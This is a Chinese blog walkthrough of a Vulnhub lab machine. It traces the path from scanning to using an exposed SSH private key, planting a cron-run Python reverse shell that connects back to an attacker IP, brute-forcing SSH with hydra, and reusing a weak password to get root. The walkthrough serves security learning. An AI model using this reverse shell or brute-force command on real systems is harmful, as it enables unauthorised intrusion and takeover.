靶機實戰2 bron2root

2022-09-06 11:18:18 字數 2760 閱讀 9673

安裝的話,我使用了virtualbox,vmware對於一些靶機不相容,開啟不了 : (

netdiscover掃瞄到靶機的ip

瀏覽器進入查詢一些資訊

三個使用者:hadijimmymartin

進行nmap掃瞄埠

這裡掃瞄到22、80、111

分別進入看看有沒有什麼資訊,但是無果~~

使用dirb查詢目錄檔案(也可以使用nikto

掃瞄後,分別進入這些檔案

在icons資料夾處發現了乙個txt文字,開啟一看是乙個私鑰!!

將這個檔案拷貝到kali的家目錄下,改名為id_rsa

分別嘗試了三個使用者之後

登入進了martin使用者

搜尋資訊

檢視隱藏檔案、進入etc/passwd檔案裡面檢視使用者資訊

進入家目錄,看到hadi、jimmy資料夾,嘗試進入

hadi資料夾進入後,好像什麼東西可以利用的

但是進jimmy資料夾的時候沒有許可權

無果~~

進入/etc/crontab/目錄

發現jimmy使用者在每隔5分鐘就會自動執行/tmp/sekurity.py檔案

但是在進入/tmp/目錄下並未發現該檔案

於是就想到可以利用python**shell進入jimmy使用者

**shell簡述-知乎

在/tmp/目錄下編寫乙個名為sekurity.py的**shell檔案,內容如下:

import socket,subprocess,os;

s=socket.socket(socket.af_inet,socket.sock_stream);

s.connect(("192.168.31.138",6666));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/bash","-i"]);

nano sekurity.py

輸入內容

儲存 ctrl + o 回車確定檔名

退出 ctrl + x

nc命令總結

在kali上使用netcat進行監聽

nc -lvp 6666
等待一會呃,成功進入jimmy使用者

但是經過一番搜尋,沒有東西。。。。

只剩下hadi使用者了

最後嘗試hadi使用者

需要搞到乙個字典

生成字典後進行爆破

hydra -l hadi -p result.txt 192.168.31.156 ssh 

-l 指定使用者名稱

-p 指定密碼檔案 用大寫代表檔案,小寫就是使用者密碼

ssh連線進入hadi使用者

ssh [email protected]
在hadi使用者這裡也沒有找到flag

於是就想嘗試進入root使用者

顯示需要密碼,就順手輸入了hadi使用者的密碼hadi123

進入到root使用者

到家目錄看到flag.txt

ok!!!

帶*號的就是我不太熟悉的地方,我個人覺得嘗試去根據別人寫的部落格去打靶機是個很不錯的學習途徑,可以涉及到很多知識面,就比如nc那部分剛剛了解只是略知一二,但是實戰一下能夠更好的理解 : p

文章:

Vulnhub靶機實戰 DC 2

描述 靶機dc 2共有5個flag,最終需要root許可權 才可以找到並檢視flag 環境 vmware虛擬機器軟體 1.檢視ip nmap sp 192.168.1.0 24 檢視ip nmap a 192.168.1.146 這裡我的靶機ip是146 2.瀏覽器訪問 發現無法正常訪問頁面,但在u...

Vulnhub靶機實戰(二) DC 2

開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...

滲透實戰 滲透測試實戰 DC 2 靶機入侵

dc 2 靶機實戰 啟動dc 2 配置其網路為nat,檢視其mac 位址,重啟dc 2 使其網路配置生效 使用nmap 掃瞄內網網段 得到dc 2 的ip位址192.168.1.162 對其進行資訊收集 訪問其ip 連線失敗 新增本地dns解析 再訪問該 解析成功 cewl 工具 cewl dc 2...